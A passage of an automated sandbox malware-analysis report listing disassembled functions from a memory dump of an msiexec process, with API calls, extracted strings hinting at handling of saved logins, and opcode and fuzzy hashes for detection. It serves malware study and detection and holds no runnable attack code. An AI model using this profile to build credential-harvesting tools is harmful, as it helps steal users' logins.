                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EB3F
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000), ref: 0040EB5B
                                                                            • memcpy.MSVCRT(?,0045A248,00000014), ref: 0040EB80
                                                                            • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014), ref: 0040EB94
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC17
                                                                            • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000), ref: 0040EC21
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC59
                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                              • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                            • String ID: ($d
                                                                            • API String ID: 1140211610-1915259565
                                                                            • Opcode ID: 612b475aad9d1d38ee13413eb206fefa6c5bad09ba85bb1eafc4472043e484bf
                                                                            • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                            • Opcode Fuzzy Hash: 612b475aad9d1d38ee13413eb206fefa6c5bad09ba85bb1eafc4472043e484bf
                                                                            • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                            Function 00417887 Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                            • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                            • GetLastError.KERNEL32 ref: 004178FB
                                                                            • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: File$ErrorLastLockSleepUnlock
                                                                            • String ID:
                                                                            • API String ID: 3015003838-0
                                                                            • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                            • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                            • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                            • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                            Function 00407E1E Relevance: 13.6, APIs: 9, Instructions: 115COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00407E44
                                                                            • memset.MSVCRT ref: 00407E5B
                                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                            • wcscpy.MSVCRT ref: 00407F10
                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                            • String ID:
                                                                            • API String ID: 59245283-0
                                                                            • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                            • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                            • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                            • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                            Function 00414E7F Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                            • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                            • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy
                                                                            • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                            • API String ID: 3510742995-3273207271
                                                                            • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                            • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                            • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                            • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                            Function 00413A3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                            • memset.MSVCRT ref: 00413ADC
                                                                            • memset.MSVCRT ref: 00413AEC
                                                                              • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                            • memset.MSVCRT ref: 00413BD7
                                                                            • wcscpy.MSVCRT ref: 00413BF8
                                                                            • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                            • String ID: 3A
                                                                            • API String ID: 3300951397-293699754
                                                                            • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                            • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                            • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                            • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                            Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                            • wcscpy.MSVCRT ref: 0040D1B5
                                                                              • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                              • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                            • wcslen.MSVCRT ref: 0040D1D3
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                            • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                            • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                            • String ID: strings
                                                                            • API String ID: 3166385802-3030018805
                                                                            • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                            • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                            • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                            • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                            Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0041249C
                                                                            • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                            • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                            • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                            • wcscpy.MSVCRT ref: 004125A0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                            • String ID: r!A
                                                                            • API String ID: 2791114272-628097481
                                                                            • Opcode ID: b6d2b1e59ff3573d6768b080da9da4b7d6a9f96c7a56722062e34d2197ac4208
                                                                            • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                            • Opcode Fuzzy Hash: b6d2b1e59ff3573d6768b080da9da4b7d6a9f96c7a56722062e34d2197ac4208
                                                                            • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                            Function 0040B58D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                            • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                                            • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                            • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                            • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                            • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                            • String ID: BIN
                                                                            • API String ID: 1668488027-1015027815
                                                                            • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                            • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                            • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                            • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                            Function 00411AC5 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 59COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00411AF6
                                                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                            • wcsrchr.MSVCRT ref: 00411B14
                                                                            • wcscat.MSVCRT ref: 00411B2E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                            • String ID: AE$.cfg$General$EA
                                                                            • API String ID: 776488737-1622828088
                                                                            • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                            • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                            • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                            • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                            Function 0040D898 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040D8BD
                                                                            • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                            • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                            • memset.MSVCRT ref: 0040D906
                                                                            • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                            • _wcsicmp.MSVCRT ref: 0040D92F
                                                                              • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                              • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                            • String ID: sysdatetimepick32
                                                                            • API String ID: 1028950076-4169760276
                                                                            • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                            • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                            • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                            • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                            Function 0041B7D9 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                            • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                            • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                            • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                            • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                            • memset.MSVCRT ref: 0041BA3D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$memset
                                                                            • String ID: -journal$-wal
                                                                            • API String ID: 438689982-2894717839
                                                                            • Opcode ID: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                                            • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                            • Opcode Fuzzy Hash: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                                            • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                            Function 00405B83 Relevance: 12.2, APIs: 8, Instructions: 197windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                            • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                            • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                              • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                              • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                            • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                            • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Item$Dialog$MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3975816621-0
                                                                            • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                            • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                            • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                            • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                            Function 00444C89 Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 154COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _wcsicmp.MSVCRT ref: 00444D09
                                                                            • _wcsicmp.MSVCRT ref: 00444D1E
                                                                            • _wcsicmp.MSVCRT ref: 00444D33
                                                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                              • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsicmp$wcslen$_memicmp
                                                                            • String ID: .save$http://$https://$log profile$signIn
                                                                            • API String ID: 1214746602-2708368587
                                                                            • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                            • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                            • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                            • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                            Function 00405DD1 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                                                            • memset.MSVCRT ref: 00405E33
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                                                            • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                                                            • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                            • String ID:
                                                                            • API String ID: 2313361498-0
                                                                            • Opcode ID: 4de784d2d0ac2fcdf607bdd3a0a0f40b32b06f5c685c24e95d41111086adbceb
                                                                            • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                            • Opcode Fuzzy Hash: 4de784d2d0ac2fcdf607bdd3a0a0f40b32b06f5c685c24e95d41111086adbceb
                                                                            • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                            Function 00405F4E Relevance: 12.1, APIs: 8, Instructions: 89windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetClientRect.USER32(?,?), ref: 00405F65
                                                                            • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                            • GetWindow.USER32(00000000), ref: 00405F80
                                                                              • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                            • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                            • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                            • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                            • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                            • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ItemMessageRectSend$Client
                                                                            • String ID:
                                                                            • API String ID: 2047574939-0
                                                                            • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                            • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                            • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                            • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                            Function 0041881C Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                            • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                            • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                            • GetTickCount.KERNEL32 ref: 0041887D
                                                                            • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                            • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                            • String ID:
                                                                            • API String ID: 4218492932-0
                                                                            • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                            • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                            • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                            • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                            Function 0044A7C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                              • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                              • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                              • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                            • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                            • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                            • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                              • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                              • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                            • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                            • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                            • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$memset
                                                                            • String ID: gj
                                                                            • API String ID: 438689982-4203073231
                                                                            • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                            • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                            • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
